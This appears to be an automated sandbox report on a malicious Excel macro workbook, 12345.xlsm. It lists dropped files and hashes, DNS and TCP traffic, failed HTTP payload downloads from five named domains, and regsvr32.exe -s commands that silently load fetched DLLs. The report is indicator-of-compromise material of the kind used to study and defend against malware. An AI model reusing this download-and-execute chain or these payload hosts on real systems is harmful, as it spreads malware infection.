              SHA-512:B3FEF15814C7CAEC05C27AE9358CD1780E8241F26B51C4DACECED0963C7893C626C60F9BBDD1DC1EA3C5E9AA03347577A361090F80CFD801408E8411A7A110F6
              Malicious:false
              Preview: L..................F...........7G.......+.......+...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):70
              Entropy (8bit):4.450013373778756
              Encrypted:false
              SSDEEP:3:oyBVomxW/LprXC3QLprXCmxW/LprXCv:djALBIQLB+LBs
              MD5:8D90BE2693870D9F8B85B2F981628B31
              SHA1:F1EA8A5440EFA7E99E91415481FC9DD89EF0D2E7
              SHA-256:AD0BDAAB996D0966EF9B85AED4713407724A2889AB06755E43E76103570E7AC9
              SHA-512:7BE5A626FC0670A5A6BD1B3A50359072D9806736816FFFF0FF25CA244BC931AA5EF4D3B751081202FEAA863AC4A2C6551CF528965DFD7152125C8CABE01609B4
              Malicious:false
              Preview: Desktop.LNK=0..[misc]..12345.LNK=0..12345.LNK=0..[misc]..12345.LNK=0..
              C:\Users\user\Desktop\A2DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):95644
              Entropy (8bit):7.876847080944676
              Encrypted:false
              SSDEEP:1536:m/JbW9FdM374yC2hawvTJIVseTSV7SaTe8NDUYl+LrHtlmuzx2rfg8:GJbW9FdM37OMvhnSaTDDFysE2rr
              MD5:050A914F070781F5D082643D109AC64B
              SHA1:19454C889848ACEE4AB57B46D558D9F7559057C6
              SHA-256:8F3F5D498B2A305BFC71CF3B9C36575AA534FB2B4385033DF802E0951F087B73
              SHA-512:6813F90051781DCDEE696054FC2777D5921DAE1819C67D7A25E6AC4521B81F56E6B736902416D9727F793AE5F6BB9403D552F4B6D2F1D9560539B998438A5285
              Malicious:false
              Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\Desktop\~$12345.xlsm
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
              MD5:96114D75E30EBD26B572C1FC83D1D02E
              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
              Malicious:true
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.884862176121338
              TrID:
              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
              • ZIP compressed archive (8000/1) 16.67%
              File name:12345.xlsm
              File size:95672
              MD5:5851c6423d6cffdbfdd9ce4276592acb
              SHA1:8992a00647a35e67a887127b5aa7269cc9c597c6
              SHA256:a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
              SHA512:8a9510adb6020f887e4fa134fe8dc9df394bf055a7c596057ca92e582f72508da624c8072ad73488d8112b402360fcc4d1e4c381ecd247c06b450c17fcd737f3
              SSDEEP:1536:Qb/ndoJz+kgpei9EM5fybX8dz+HAITWPtsmLMWzMNFOfhOJYS6xybsD9fe2hawZ+:QbpJ5fybX8dz+HzT0s+MWzYoUJixzWMo
              File Content Preview:PK..........!...`.............[Content_Types].xml ...(.........................................................................................................................................................................................................

              File Icon

              Icon Hash:e4e2aa8aa4bcbcac

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "12345.xlsm"

              Indicators

              Has Summary Info:
              Application Name:
              Encrypted Document:
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:

              Macro 4.0 Code

               (Macro 4.0 code export: the captured sheet rows contain only empty cells; no formula text appears in this excerpt.)

              Network Behavior

              Network Port Distribution

              TCP Packets

               Timestamp | Source Port | Dest Port | Source IP | Dest IP
               Apr 6, 2021 09:48:01.163120031 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.201642990 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:01.201731920 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.202414036 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.283674955 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:01.613493919 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:01.613579035 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:01.613660097 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.613713026 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.613914967 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.652276993 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:01.682090998 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.720725060 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:01.720828056 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.721354961 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:01.803678989 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.127644062 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.127686024 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.127845049 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:02.128031969 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:02.166296005 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.482728004 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:02.521353960 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.521567106 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:02.522023916 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:02.603694916 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.928333998 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.928371906 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:02.928489923 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:02.928627968 CEST | 49167 | 80 | 192.168.2.22 | 8.211.4.209
               Apr 6, 2021 09:48:02.967076063 CEST | 80 | 49167 | 8.211.4.209 | 192.168.2.22
               Apr 6, 2021 09:48:03.003235102 CEST | 49168 | 80 | 192.168.2.22 | 74.208.236.90
               Apr 6, 2021 09:48:03.161860943 CEST | 80 | 49168 | 74.208.236.90 | 192.168.2.22
               Apr 6, 2021 09:48:03.161964893 CEST | 49168 | 80 | 192.168.2.22 | 74.208.236.90
               Apr 6, 2021 09:48:03.162693024 CEST | 49168 | 80 | 192.168.2.22 | 74.208.236.90
               Apr 6, 2021 09:48:03.321307898 CEST | 80 | 49168 | 74.208.236.90 | 192.168.2.22
               Apr 6, 2021 09:48:03.409498930 CEST | 80 | 49168 | 74.208.236.90 | 192.168.2.22
               Apr 6, 2021 09:48:03.409692049 CEST | 49168 | 80 | 192.168.2.22 | 74.208.236.90
               Apr 6, 2021 09:48:03.410177946 CEST | 49168 | 80 | 192.168.2.22 | 74.208.236.90
               Apr 6, 2021 09:48:03.415561914 CEST | 80 | 49168 | 74.208.236.90 | 192.168.2.22
               Apr 6, 2021 09:48:03.415684938 CEST | 49168 | 80 | 192.168.2.22 | 74.208.236.90
               Apr 6, 2021 09:48:03.569153070 CEST | 80 | 49168 | 74.208.236.90 | 192.168.2.22
               Apr 6, 2021 09:48:03.569214106 CEST | 49168 | 80 | 192.168.2.22 | 74.208.236.90
               Apr 6, 2021 09:48:03.841801882 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:48:04.034101963 CEST | 80 | 49169 | 103.205.143.227 | 192.168.2.22
               Apr 6, 2021 09:48:04.034275055 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:48:04.034775972 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:48:04.226507902 CEST | 80 | 49169 | 103.205.143.227 | 192.168.2.22
               Apr 6, 2021 09:48:04.761071920 CEST | 80 | 49169 | 103.205.143.227 | 192.168.2.22
               Apr 6, 2021 09:48:04.761336088 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:48:15.172677040 CEST | 80 | 49169 | 103.205.143.227 | 192.168.2.22
               Apr 6, 2021 09:48:15.172846079 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:50:00.743765116 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:50:01.241911888 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:50:02.209271908 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:50:04.143825054 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227
               Apr 6, 2021 09:50:07.997279882 CEST | 49169 | 80 | 192.168.2.22 | 103.205.143.227

              UDP Packets

               Timestamp | Source Port | Dest Port | Source IP | Dest IP
               Apr 6, 2021 09:48:00.806061029 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
               Apr 6, 2021 09:48:01.147500992 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
               Apr 6, 2021 09:48:01.625456095 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
               Apr 6, 2021 09:48:01.679797888 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
               Apr 6, 2021 09:48:02.142688036 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
               Apr 6, 2021 09:48:02.480325937 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
               Apr 6, 2021 09:48:02.946787119 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
               Apr 6, 2021 09:48:03.001132965 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
               Apr 6, 2021 09:48:03.421154022 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
               Apr 6, 2021 09:48:03.839102030 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22

              DNS Queries

               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
               Apr 6, 2021 09:48:00.806061029 CEST | 192.168.2.22 | 8.8.8.8 | 0x73f5 | Standard query (0) | velma-harber30ku.com | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:01.625456095 CEST | 192.168.2.22 | 8.8.8.8 | 0x8296 | Standard query (0) | laura9630fr.com | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:02.142688036 CEST | 192.168.2.22 | 8.8.8.8 | 0x15d4 | Standard query (0) | mills-skyla30ec.com | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:02.946787119 CEST | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | moumitas.com | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:03.421154022 CEST | 192.168.2.22 | 8.8.8.8 | 0x887e | Standard query (0) | jacktech.jackindia.com | A (IP address) | IN (0x0001)

              DNS Answers

               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
               Apr 6, 2021 09:48:01.147500992 CEST | 8.8.8.8 | 192.168.2.22 | 0x73f5 | No error (0) | velma-harber30ku.com | | 8.211.4.209 | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:01.679797888 CEST | 8.8.8.8 | 192.168.2.22 | 0x8296 | No error (0) | laura9630fr.com | | 8.211.4.209 | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:02.480325937 CEST | 8.8.8.8 | 192.168.2.22 | 0x15d4 | No error (0) | mills-skyla30ec.com | | 8.211.4.209 | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:03.001132965 CEST | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | moumitas.com | | 74.208.236.90 | A (IP address) | IN (0x0001)
               Apr 6, 2021 09:48:03.839102030 CEST | 8.8.8.8 | 192.168.2.22 | 0x887e | No error (0) | jacktech.jackindia.com | | 103.205.143.227 | A (IP address) | IN (0x0001)

              HTTP Request Dependency Graph

              • velma-harber30ku.com
              • laura9630fr.com
              • mills-skyla30ec.com
              • moumitas.com
              • jacktech.jackindia.com

              HTTP Packets

               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
               0 | 192.168.2.22 | 49165 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
               Timestamp | kBytes transferred | Direction | Data
               Apr 6, 2021 09:48:01.202414036 CEST | 0 | OUT | GET /gg.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: velma-harber30ku.com
              Connection: Keep-Alive
               Apr 6, 2021 09:48:01.613493919 CEST | 1 | IN | HTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 07:48:01 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 74
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
               1 | 192.168.2.22 | 49166 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
               Timestamp | kBytes transferred | Direction | Data
               Apr 6, 2021 09:48:01.721354961 CEST | 2 | OUT | GET /gg.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: laura9630fr.com
              Connection: Keep-Alive
               Apr 6, 2021 09:48:02.127644062 CEST | 2 | IN | HTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 07:48:01 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 74
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
               2 | 192.168.2.22 | 49167 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
               Timestamp | kBytes transferred | Direction | Data
               Apr 6, 2021 09:48:02.522023916 CEST | 3 | OUT | GET /gg.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: mills-skyla30ec.com
              Connection: Keep-Alive
               Apr 6, 2021 09:48:02.928333998 CEST | 3 | IN | HTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 07:48:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 74
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
               3 | 192.168.2.22 | 49168 | 74.208.236.90 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
               Timestamp | kBytes transferred | Direction | Data
               Apr 6, 2021 09:48:03.162693024 CEST | 4 | OUT | GET /ds/0204.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: moumitas.com
              Connection: Keep-Alive
               Apr 6, 2021 09:48:03.409498930 CEST | 5 | IN | HTTP/1.1 503 Service Unavailable
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Keep-Alive: timeout=15
              Date: Tue, 06 Apr 2021 07:48:03 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.27
              Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 30 32 30 34 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a
              Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/0204.gif was not found on this server.


               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
               4 | 192.168.2.22 | 49169 | 103.205.143.227 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
               Timestamp | kBytes transferred | Direction | Data
               Apr 6, 2021 09:48:04.034775972 CEST | 6 | OUT | GET /ds/0204.gif HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: jacktech.jackindia.com
              Connection: Keep-Alive
               Apr 6, 2021 09:48:04.761071920 CEST | 6 | IN | HTTP/1.1 503 Service Unavailable
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Content-Length: 97
              Content-Encoding: gzip
              Vary: Accept-Encoding
              Date: Tue, 06 Apr 2021 07:48:03 GMT
              Server: LiteSpeed
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 30 32 30 d1 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 b3 0a 0e ff 4f 00 00 00
              Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)7020KLS(O,V/QHPS(,V(N-*K-O


              Behavior

              System Behavior

              General

              Start time:09:47:36
              Start date:06/04/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13fcf0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:43
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:43
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf1.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:44
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf2.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:44
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf3.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:09:47:44
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe -s ..\nvcoerf4.dll
              Imagebase:0xff1a0000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
